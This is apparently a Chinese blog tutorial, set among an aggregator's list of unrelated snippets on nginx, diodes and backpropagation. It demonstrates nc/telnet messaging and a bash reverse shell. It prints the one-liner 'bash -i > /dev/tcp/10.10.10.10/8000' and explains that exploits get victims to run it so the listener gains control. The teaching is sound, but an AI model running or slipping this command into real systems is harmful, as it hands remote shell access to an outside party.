-
2022-02-25 16:22:32
实验一:
A机器传递信息到B机器:
测试环境macOS 10.15
1、A用nc命令 listen本机一个端口号nc -l 8000
2、B 用telnet命令 去连接A机器的ip和端口号
telnet ipA 8000
3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输
telnet的退出 ctrl+]
实验二:
反向shell,A机器控制B机器
一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B;
另一种方式:方向shell,B主动连接A,然后A控制B。
测试环境macOS 10.15
1、A用nc命令 listen本机一个端口号nc -l 8000
2、B机器执行
bash -i > /dev/tcp/10.10.10.10/8000 0>&1 2>&1
bash -i 意思是打开一个交互式的shell
bash -i > 指的是交互shell的输出 输出到/dev/tcp/10.10.10.10/8000
linux中一切皆是文件,这里其实是一个设备文件,指向了另一台机器。
0>&1 2>&1 指的是标准输入 和标准输出一样的位置,错误输出到和标准输出一样的位置。0 指的是标准输入,2 指的是错误输出,1指的是标准输出。我们知道LINUX下有三种文件描述符:
- 标准输入:standard input 0 (默认设备键盘)
- 标准输出:standard output 1(默认设备显示器)
- 错误输出:error output 2(默认设备显示器)
这里相当于重定向位置了。相当于打开了一个shell,然后这个shell所有的输入、输出、错误输出都到那个文件。
这个原理就是反向shell。3、A机器此时就获得了 B机器打开的shell的输入 输出和错误输出,并且拥有打开这个shell的B机器用户的所有权限。
可以测试pwd命令,vi命令,ls命令等等,都能在A机器获得反馈。
相当于A控制了B机器。
整个过程是:A机器listen一个端口号,B连接A机器的端口号,那么A就能控制B机器。很多漏洞都用了这种核心去控制机器,想办法让对方机器执行命令bash -i > /dev/tcp/10.10.10.10/8000 0>&1 2>&1,填写机器的ip和端口号。参考:反向shell
更多相关内容 -
SIRIUS S6 / S10 / S12 反向组合的接线套件[手册].pdf
2019-11-02 02:23:26SIRIUS S6 / S10 / S12 反向组合的接线套件[手册]pdf, -
(5)Nginx 配置实例二 反向代理
2021-01-09 12:18:54使用Nginx反向代理,根据访问的路径跳转到不同端口的服务中,Nginx监听端口为9001 访问http://127.0.0.1:9001/bs-manager/ 直接跳转到127.0.0.1:8001 访问http://127.0.0.1:9001/bs-webapp/ 直接跳转到... -
nginx反向代理二级域名绑定方法及注意事项
2021-01-10 01:21:41(在这里我们仅谈公网情况)即使我们只有一个域名,我们可以设置多个二级域名,使用Nginx很容易实现。 2、基本要求 通常,网上教程会直接贴一段配置文件的代码,告诉我们如此这般就Ok了。但我发现很多新手看着教程... -
Nginx的反向代理实例详解
2021-01-20 14:25:30一、反向代理实例 1 1、实现效果 (1)打开浏览器,在浏览器中输入www.123.com,跳转到linux系统tomcat主页面。 2、具体配置 (1)在windows系统的host文件进行域名和ip对应关系 (2)在Nginx进行请求 注意... -
利用.net core实现反向代理中间件的方法
2021-01-01 21:08:29进行了一段时间后,发现经常配置Nginx一来比较麻烦,二来容易配错;便想将这个反向代理的功能放在.net core程序中去,实现如下的功能: Rest请求直接发往.net core程序 如果该请求在.net core程序中实现,则执行... -
二进制反向学习烟花算法求解多维背包问题
2021-03-14 20:32:15为将烟花算法应用于离散优化领域并有效求解多维背包问题,构建一种二进制反向学习烟花算法。.首先,通过定义二进制字符串距离、二进制转置算子将烟花算法的爆炸算子、变异算子离散化,构建二进制烟花算.法;其次,... -
tensorflow 实现自定义梯度反向传播代码
2020-12-20 15:27:48sign函数可以对数值进行二值化,但在梯度反向传播是不好处理,一般采用一个近似函数的梯度作为代替,如上图的Htanh。在[-1,1]直接梯度为1,其他为0。 #使用修饰器,建立梯度反向传播函数。其中op.input包含输入值、... -
webpack里如何配置反向代理,怎样配置反向代理,webpack配置反向代理(前后端联调),如何用反向代理解决跨域...
2021-01-20 12:52:14一、为啥要叫反向代理 正向代理隐藏真实客户端,反向代理隐藏真实服务端。 二、反向代理解决的问题 反向代理解决的就是跨域,在前后端联调的情况下,前端有服务器,后端也有服务器,那么联调时,就存在跨域问题 ... -
电子测量中的测试二极管反向恢复特性的分析仪
2020-11-22 12:09:29测试二极管的反向恢复特性一般都需要复杂的测试设备。必须能够建立正向导通条件、正向闭锁状态、及两者间的过渡。还需要有一种从所得到的波形中提取特征的手段。总而言之,这并不是一项很简单的例行操...速度较慢的二极 -
反向传播算法PPT
2018-11-30 20:16:59这是我在机器学习课程上做汇报用的反向传播算法的PPT,主要是通过学习吴恩达老师的课程总结得来 -
详解nginx配置url重定向-反向代理
2021-01-20 16:20:36二、nginx 反向代理 1、地址重定向:是指当使用者浏览某个网址时,将他导向到另一个网址的技术。常用在把一串很长的网址,转成较短的网址。因为当要传播某网站时,常常因为网址太长,不好记忆;又有可能因为换了... -
元器件应用中的二极管反向恢复电流
2020-11-16 11:55:06以AC/DC Boost开关电源为例,如图1所示,主电路中输人整流桥二极管产生的反向恢复电流的di/dt远比输出...因此,可以不计整流桥二极管产生的|du/dt|和|di/dt|的影响,而把整流电路当成电磁干扰耦合通道的一部分来加以 -
基于Nginx 反向代理获取真实IP的问题详解
2021-01-10 00:09:42前文Nginx 解决WebApi跨域二次请求以及Vue单页面问题 当中虽然解决了跨域问题带来的二次请求,但也产生了一个新的问题,就是如果需要获取用户IP的时候,获取的IP地址总是本机地址。 二、原因 由于Nginx反向代理后,... -
nginx反向代理之将80端口请求转发到8080
2021-01-10 07:30:15先来理解一波概念,什么是nginx反向代理? 反向代理的意思是以代理服务器(这里也就是nginx)来接收网络上的请求,也就是url(默认是80端口), 1,nginx通过对url里面的一些判断(转达规则配置在nginx配置文件中),... -
肖特基二极管的反向恢复过程解析
2021-01-20 00:25:46肖特基二极管以发明人肖特基博士(Schottky)命名。 (Schottky Barrier ... 二极管从正向导通到反向截止有一个反向恢复的过程,而不是立即由导通到截止。 对上述的肖特基二极管上加电压。 在0-t1时间内,给二极 -
几分钟弄明白 BP 反向传播算法
2021-01-06 15:44:01今天有朋友咨询我反向传播算法,我觉得不需要太复杂的推导,就可以解释清楚这个算法的原理。 序 假定神经网络采用下面的结构: 1. 最简单的神经网络模型 我们考虑最简单的情况:一个输入节点、一个输出节点、一个... -
Tensorflow 卷积的梯度反向传播过程
2020-12-20 17:47:43第二种情况,在已知张量的情况下,对未知卷积核求导(即对卷积核中每一个变量求导) 1.已知卷积核,对未知张量求导 我们用一个简单的例子理解valid卷积的梯度反向传播。假设有一个3×3的未知张量x,以及已知的2×2的... -
反向传播算法.rar
2019-12-07 11:06:22本项目主要实现了python端的反向传播算法,通过实现算法本身而不是调用库实现,另外里面还进行了包括调整激活函数,学习参数,学习率的调整方法等对原始程序进行了改进,可以用来进行不同参数下实现的比较 -
反向React:一个使用反向API来显示反向字符串结果的React App
2021-02-17 04:24:04使用React制作的前端使用我们的反向API,并显示反向字符串 重要文件夹 app/axios包含进行api调用的Axios实例。 app/components包含用于容器或屏幕的React函数组件。 app/containers包含作为Web应用程序页面的React... -
让iis记录nginx反向代理的真实ip
2021-01-10 03:37:10一、设置X-Forwarded-For段 nginx配置示例: 代码如下:server{ location { … proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; … }} 二、在iis站点上安装isapi filter 在f5的开发论坛上... -
元器件应用中的二极管的开关作用和反向恢复时间
2020-10-15 18:30:01二极管的开关作用利用二极管正、反向电流相差悬殊这一特性,可以把二极管作开关使用。当开关K打向A时,二极管处于正向,电流很大,相当于接有负载的外回路与电源相连的开关闭合,回路处于接通状态(开态);当开关K... -
反向传播神经网络.rar
2019-06-18 09:50:59此资源包含着反向传播的应用程序,教你怎么下载和使用。 -
终极对冲(12)(1)_ea_终极对冲EA_反向对冲ea_盈利EA_
2021-10-03 13:33:47策略原理: 本策略可以同时进行两笔行情相关,反向相反,数量相当,盈亏相抵的策略,EA自带止损止盈,盈利能力虽然不是很强但是还算相对稳定。它能够24小时捕捉行情,准确判断机会,独有的支撑压力开仓——入场准、... -
基于反向摄影的三维坐标测量方法
2021-02-09 21:58:41提出一种基于反向摄影的光学坐标测量方法。测量系统主要由微型摄像机、测杆和液晶显示器组成。测杆的一端固定微型摄像机,另一端是一个触发测头,液晶显示器上显示的是二维正弦条纹图。测量时,将液晶显示屏置于被测... -
使用nginx反向代理实现直接访问域名而不用输入端口
2021-01-07 12:57:12首先是nginx安装 [root@iZbp1fuxe9jel2667kxu6eZ ~]# yum ...如果服务器上还有其他的项目,再写一个server即可 测试配置是否成功 [root@iZbp1fuxe9jel2667kxu6eZ nginx]# nginx -t nginx: the configuration file /etc -
django3.0.4反向解析
2021-01-20 02:29:35需要注意的是:include()这个函数中是两个参数,一个arg,一个namespace,参数arg是一个元组,元组中一个是地址,一个是app的名字,第二个namespace是为了在反向解析中定位到这个应用中用的。如果不出一会出现错误,... -
Django用数据库表反向生成models类知识点详解
2020-12-20 12:20:53Django根据已有数据库表反向生成models类 一. 创建一个Django项目 django-admin startproject ‘xxxx‘ 二、修改settings文件 在setting里面设置你要连接的数据库名称,地址,账号密码之类的信息,和创建新项目的... -
python 实现反向输出
2022-06-08 17:34:24# 题目:给一个不多于5位的正整数,要求:一、求它是几位数,二、逆序打印出各位数字。 -
反向代理服务器 Nginx
2021-05-08 10:18:28二的 Rambler.ru 站点开发的一款服务器。2004 年 10 月发布第一个版本。 Nginx 的官网: http://nginx.org 国内大型的站点,例如百度、京东、新浪、网易、腾讯、淘宝等,都使用了 Nginx。 https://www.netcraft.com/
收藏数
460,183
精华内容
184,073